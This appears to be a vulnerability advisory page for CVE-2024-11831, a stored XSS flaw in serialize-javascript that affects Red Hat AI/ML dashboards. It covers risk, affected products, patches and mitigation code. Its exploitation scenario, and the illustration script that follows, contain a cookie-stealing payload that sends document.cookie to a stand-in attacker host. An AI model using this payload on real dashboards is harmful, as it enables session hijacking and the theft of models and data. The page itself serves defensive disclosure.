CVE-2024-11831: serialize-javascript: XSS via regex in AI/ML dashboards

MEDIUM
Published February 10, 2025
CISO Take

serialize-javascript fails to sanitize regex and certain JavaScript object types before serialization, allowing an authenticated attacker with low privileges to inject scripts that execute in any browser rendering that serialized output — a classic stored XSS path. The blast radius is meaningful: 2,959 downstream npm dependents and 12 prior CVEs in this same package signal a persistently under-hardened component now embedded in Red Hat AI/ML products, including Open Data Hub dashboards, ODH ML pipelines, OpenShift AI (Lightspeed), and Ansible Automation Platform Lightspeed. CVSS 5.4 and absence from CISA KEV moderate urgency, but the privileged user base — ML engineers and platform admins accessing these dashboards — means a successful session hijack translates directly into access to model registries, training infrastructure, and data pipelines. Apply the applicable Red Hat advisories (RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, and six others) and upgrade serialize-javascript to ≥6.0.2 in any internal webpack-bundled tooling.

Sources: NVD, OpenSSF, ATLAS, Red Hat Security Advisories

What is the risk?

Medium risk overall, elevated in AI/ML platform contexts. Exploitation requires low privileges and user interaction (a victim must load a page rendering attacker-controlled serialized data), limiting opportunistic mass exploitation. However, the affected products include AI/ML control planes — Open Data Hub dashboard, OpenShift AI Lightspeed, ODH ML pipelines — where a compromised session grants access to model registries, training infrastructure, and pipeline configurations. The 12 historical CVEs in serialize-javascript and an OpenSSF Scorecard of 5.6/10 indicate weak upstream security hygiene, increasing likelihood of recurring issues. Organizations running Red Hat AI/ML stacks on OpenShift should treat this as P2 patching priority.

How does the attack unfold?

  1. Malicious Input Injection (AML.T0049): Attacker with low-privilege dashboard access (e.g., data scientist role) submits a regex or JS object containing an XSS payload into a field that will be serialized, such as a pipeline name, notebook config, or dataset label.

  2. Unsafe Serialization (AML.T0010.001): serialize-javascript processes the input without proper sanitization, embedding the malicious regex or object directly into a server-rendered JavaScript bundle sent to other users' browsers.

  3. Browser-Side Code Execution (AML.T0078): When a privileged user (ML admin, platform operator) loads the affected dashboard page, the injected payload executes silently in their browser context.

  4. AI Infrastructure Takeover (AML.T0012): The exfiltrated session token is used to impersonate the victim account, granting the attacker access to model registries, training pipelines, and notebook environments to exfiltrate models or inject poisoned data.

What systems are affected?

Package (ecosystem, vulnerable range, patched status):
Jupyter Notebook (pip): No patch
  Package profile: 13.2K; OpenSSF 5.6; 3.0K dependents; pushed 7d ago; 60% patched; ~454d to patch
3scale-amp-system-container No patch
aap-cloud-ui-container No patch
advanced-cluster-security/rhacs-central-db-rhel8 No patch
advanced-cluster-security/rhacs-main-rhel8 No patch
advanced-cluster-security/rhacs-rhel8-operator No patch
advanced-cluster-security/rhacs-roxctl-rhel8 No patch
advanced-cluster-security/rhacs-scanner-v4-db-rhel8 No patch
advanced-cluster-security/rhacs-scanner-v4-rhel8 No patch
ansible-automation-platform-24/lightspeed-rhel8 No patch
automation-controller No patch
automation-eda-controller No patch
ceph No patch
devspaces/code-rhel8 No patch
devspaces/dashboard-rhel8 No patch
devspaces/traefik-rhel8 No patch
discovery-server-container No patch
dotnet6.0 No patch
dotnet7.0 No patch
dotnet8.0 No patch
grafana No patch
libarrow No patch
migration-toolkit-virtualization/mtv-console-plugin-rhel9 No patch
nodejs-compression-webpack-plugin No patch
nodejs-webpack No patch
odf4/ocs-client-console-rhel9 No patch
odf4/odf-console-rhel9 No patch
odf4/odf-multicluster-console-rhel9 No patch
odh-dashboard-container No patch
odh-dashboard-rhel8 No patch
odh-data-science-pipelines-argo-argoexec-rhel8 No patch
odh-data-science-pipelines-argo-workflowcontroller-rhel8 No patch
odh-ml-pipelines-api-server-v2-rhel8 No patch
odh-ml-pipelines-driver-rhel8 No patch
odh-ml-pipelines-launcher-rhel8 No patch
odh-ml-pipelines-persistenceagent-v2-rhel8 No patch
odh-ml-pipelines-scheduledworkflow-v2-rhel8 No patch
odh-model-registry-rhel8 No patch
odh-operator-container No patch
openshift-lightspeed-beta/lightspeed-console-plugin-rhel9 No patch
openshift-logging/kibana6-rhel8 No patch
openshift-pipelines/pipelines-console-plugin-rhel8 No patch
openshift-pipelines/pipelines-console-plugin-rhel9 No patch
openshift-pipelines/pipelines-hub-api-rhel8 No patch
openshift-pipelines/pipelines-hub-db-migration-rhel8 No patch
openshift-pipelines/pipelines-hub-ui-rhel8 No patch
openshift-service-mesh/kiali-ossmc-rhel8 No patch
openshift-service-mesh/kiali-rhel8 No patch
openshift3/ose-console No patch
openshift4/ose-monitoring-plugin-rhel9 No patch
pcs No patch
pybind No patch
quay/quay-rhel8 No patch
rh-dotnet60-dotnet No patch
rhacm2/console-rhel8 No patch
rhceph/rhceph-8-rhel9 No patch
rhceph/rhceph-9-rhel9 No patch
rhdh-hub-container No patch
rhosdt/jaeger-agent-rhel8 No patch
rhosdt/jaeger-all-in-one-rhel8 No patch
rhosdt/jaeger-collector-rhel8 No patch
rhosdt/jaeger-es-index-cleaner-rhel8 No patch
rhosdt/jaeger-es-rollover-rhel8 No patch
rhosdt/jaeger-ingester-rhel8 No patch
rhosdt/jaeger-query-rhel8 No patch
rhtpa/rhtpa-trustification-service-rhel9 No patch
serialize-javascript No patch

How severe is it?

CVSS 3.1: 5.4 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: Trivial

What is the attack surface?

Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None

What should I do?

5 steps
  1. Patch (Red Hat products): Apply RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, RHSA-2025:3870, RHSA-2025:4511, RHSA-2025:8059, RHSA-2025:10853, RHSA-2025:21068, RHSA-2025:21203 for all affected RHEL/OpenShift products.

  2. Upgrade in-house tooling: pin serialize-javascript to ≥6.0.2 in any npm/webpack project; run 'npm audit' or 'grype' to surface transitive inclusions.

  3. Harden dashboards: enforce a strict Content-Security-Policy (script-src 'self') on AI dashboard origins to block inline and cross-origin script execution as defense-in-depth.

  4. Detection: monitor WAF and CSP violation logs for unexpected script-src executions from AI dashboard origins; flag POST bodies containing regex literals or Function constructor patterns submitted to serialization endpoints.

  5. If patching is delayed: restrict access to affected dashboards to trusted networks via network policy or RBAC controls on OpenShift.
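As an added helper for step 2 (not from Red Hat or the serialize-javascript project), the script below walks a lockfileVersion 2 or 3 package-lock.json and lists every copy of serialize-javascript below the fixed version 6.0.2, including transitive copies nested under other packages; the lockfile contents and function names are a constructed sample of mine.

```javascript
// Added helper, not project code: report every serialize-javascript copy in a
// package-lock.json (lockfileVersion 2 or 3) that is older than 6.0.2.
const FIXED = [6, 0, 2];
const PKG = 'serialize-javascript';

// "6.0.1" -> [6, 0, 1]; pre-release suffixes are ignored for this check.
function parseVersion(v) {
  const m = /^(\d+)\.(\d+)\.(\d+)/.exec(v);
  return m ? m.slice(1, 4).map(Number) : null;
}

// True when version a is strictly lower than version b.
function isBelow(a, b) {
  for (let i = 0; i < 3; i++) {
    if (a[i] !== b[i]) return a[i] < b[i];
  }
  return false;
}

// Returns [{ path, version }] for each vulnerable copy. Lockfile v2/v3 keeps a
// flat "packages" map whose keys are install paths, so nested copies such as
// "node_modules/foo/node_modules/serialize-javascript" are found too.
function findVulnerableCopies(lock) {
  const hits = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (!path.endsWith('node_modules/' + PKG)) continue;
    const ver = parseVersion(meta.version || '');
    if (ver && isBelow(ver, FIXED)) hits.push({ path, version: meta.version });
  }
  return hits;
}

// Constructed sample lockfile: the direct copy is already fixed, but a second
// copy pulled in under a webpack plugin is still on 6.0.1.
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'dashboard', version: '1.0.0' },
    'node_modules/serialize-javascript': { version: '6.0.2' },
    'node_modules/terser-webpack-plugin': { version: '5.3.0' },
    'node_modules/terser-webpack-plugin/node_modules/serialize-javascript': { version: '6.0.1' },
  },
};

console.log(findVulnerableCopies(SAMPLE_LOCK));
```

To run it against a real project, replace SAMPLE_LOCK with JSON.parse(fs.readFileSync('package-lock.json', 'utf8')).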

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.9.3 - AI system security
NIST AI RMF
MANAGE 2.2 - Mechanisms for identifying and managing AI risk are established
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2024-11831?

CVE-2024-11831 is a stored cross-site scripting (XSS) flaw in the serialize-javascript npm package, which fails to sanitize regexes and certain other JavaScript object types before serializing them, so an authenticated low-privilege attacker can inject script that runs in any browser rendering the serialized output. It carries a CVSS 3.1 score of 5.4, is not in CISA KEV, and is embedded in Red Hat AI/ML products including Open Data Hub dashboards, ODH ML pipelines, OpenShift AI (Lightspeed), and Ansible Automation Platform Lightspeed. The fix is to apply the applicable Red Hat advisories (RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, and six others) and to upgrade serialize-javascript to ≥6.0.2 in any internal webpack-bundled tooling.

Is CVE-2024-11831 actively exploited?

No confirmed active exploitation of CVE-2024-11831 has been reported, but organizations should still patch proactively.

How to fix CVE-2024-11831?

  1. Patch (Red Hat products): Apply RHSA-2025:0381, RHSA-2025:1334, RHSA-2025:1468, RHSA-2025:3870, RHSA-2025:4511, RHSA-2025:8059, RHSA-2025:10853, RHSA-2025:21068, RHSA-2025:21203 for all affected RHEL/OpenShift products.

  2. Upgrade in-house tooling: pin serialize-javascript to ≥6.0.2 in any npm/webpack project; run 'npm audit' or 'grype' to surface transitive inclusions.

  3. Harden dashboards: enforce a strict Content-Security-Policy (script-src 'self') on AI dashboard origins to block inline and cross-origin script execution as defense-in-depth.

  4. Detection: monitor WAF and CSP violation logs for unexpected script-src executions from AI dashboard origins; flag POST bodies containing regex literals or Function constructor patterns submitted to serialization endpoints.

  5. If patching is delayed: restrict access to affected dashboards to trusted networks via network policy or RBAC controls on OpenShift.

What systems are affected by CVE-2024-11831?

This vulnerability affects the following AI/ML architecture patterns: ML dashboards and platform UIs, ML pipeline management interfaces, Model registry and serving control planes, AI-enabled DevOps and automation tooling, Notebook management platforms.

What is the CVSS score for CVE-2024-11831?

CVE-2024-11831 has a CVSS v3.1 base score of 5.4 (MEDIUM).

What is the AI security impact?

Affected AI Architectures

  • ML dashboards and platform UIs
  • ML pipeline management interfaces
  • Model registry and serving control planes
  • AI-enabled DevOps and automation tooling
  • Notebook management platforms

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0012 Valid Accounts
AML.T0049 Exploit Public-Facing Application
AML.T0078 Drive-by Compromise

Compliance Controls Affected

EU AI Act: Art. 15
ISO 42001: A.9.3
NIST AI RMF: MANAGE 2.2
OWASP LLM Top 10: LLM03:2025

What are the technical details?

Original Advisory

A flaw was found in npm-serialize-javascript. The vulnerability occurs because the serialize-javascript module does not properly sanitize certain inputs, such as regex or other JavaScript object types, allowing an attacker to inject malicious code. This code could be executed when deserialized by a web browser, causing Cross-site scripting (XSS) attacks. This issue is critical in environments where serialized data is sent to web clients, potentially compromising the security of the website or web application using this package.

Exploitation Scenario

A data scientist with standard dashboard access crafts a pipeline parameter or notebook configuration field containing a regex-wrapped XSS payload — for example, a project name set to /(<img src=x onerror='fetch("https://attacker.com/c?"+document.cookie)'>)/g. When serialize-javascript processes this value to embed it in a server-rendered page bundle, it fails to neutralize the embedded HTML. The next time an ML platform admin reviews pipeline configurations in the ODH dashboard, the payload executes in their browser, silently exfiltrating their session cookie to the attacker. Using that token, the adversary impersonates the admin, accesses the model registry, exfiltrates proprietary fine-tuned models, or injects poisoned dataset references into active training pipelines — all within the bounds of a legitimate authenticated session.
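The scenario above turns on the regex source reaching the page without JavaScript-string encoding. The following added example (not code from serialize-javascript or from Red Hat) contrasts an unsafe verbatim emit with a hardened encoder, using the payload quoted above, and includes the output check a reviewer can run on any serialized blob destined for an inline script; the function names are assumptions of mine.

```javascript
// Added illustration, not serialize-javascript's own code: a regex value must
// be encoded as JavaScript-string data before it is embedded in an inline
// <script>, plus the output check a reviewer can apply. The payload is the one
// quoted in the scenario above, built with the RegExp constructor.
const PAYLOAD = new RegExp(
  '(<img src=x onerror=\'fetch("https://attacker.com/c?"+document.cookie)\'>)',
  'g'
);

// Unsafe form: the regex literal is emitted verbatim, so '<', '>' and '/' from
// the source land in the page untouched; a "</script>" sequence in the source
// would terminate the inline script and hand the rest to the HTML parser.
function serializeRegExpNaive(rx) {
  return String(rx); // e.g. /(<img src=x ...>)/g
}

// Hardened form: the source is serialized as a JSON string (quotes and
// backslashes handled), then '<', '>', '/', U+2028 and U+2029 are rewritten as
// \uXXXX escapes so the text can never close a <script> tag or open an element.
const UNSAFE = /[<>\/\u2028\u2029]/g;
const ESC = { '<': '\\u003C', '>': '\\u003E', '/': '\\u002F',
              '\u2028': '\\u2028', '\u2029': '\\u2029' };
function serializeRegExpSafe(rx) {
  const src = JSON.stringify(rx.source).replace(UNSAFE, (c) => ESC[c]);
  return `new RegExp(${src}, "${rx.flags}")`;
}

// The server-side template that embeds the serialized value in the page.
function renderInlineScript(serialized) {
  return `<script>window.__STATE__ = ${serialized};</script>`;
}

// Output check: a blob destined for a <script> block must contain no raw angle
// brackets or line/paragraph separators; if it does, the template is injectable.
function isScriptSafe(serialized) {
  return !/[<>\u2028\u2029]/.test(serialized);
}

// Round trip: evaluating the hardened output (as a consumer bundle would)
// rebuilds an equivalent RegExp, so the escaping costs nothing in fidelity.
function roundTrip(serialized) {
  const rx = new Function(`return (${serialized});`)();
  return { source: rx.source, flags: rx.flags };
}

console.log(isScriptSafe(serializeRegExpNaive(PAYLOAD)), isScriptSafe(serializeRegExpSafe(PAYLOAD)));
```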

Weaknesses (CWE)

CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

  • [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
  • [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the: HTML body; element attributes (such as src="XYZ"); URIs; JavaScript sections; Cascading Style Sheets; etc. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Timeline

Published: February 10, 2025
Last Modified: June 8, 2026
First Seen: June 12, 2026
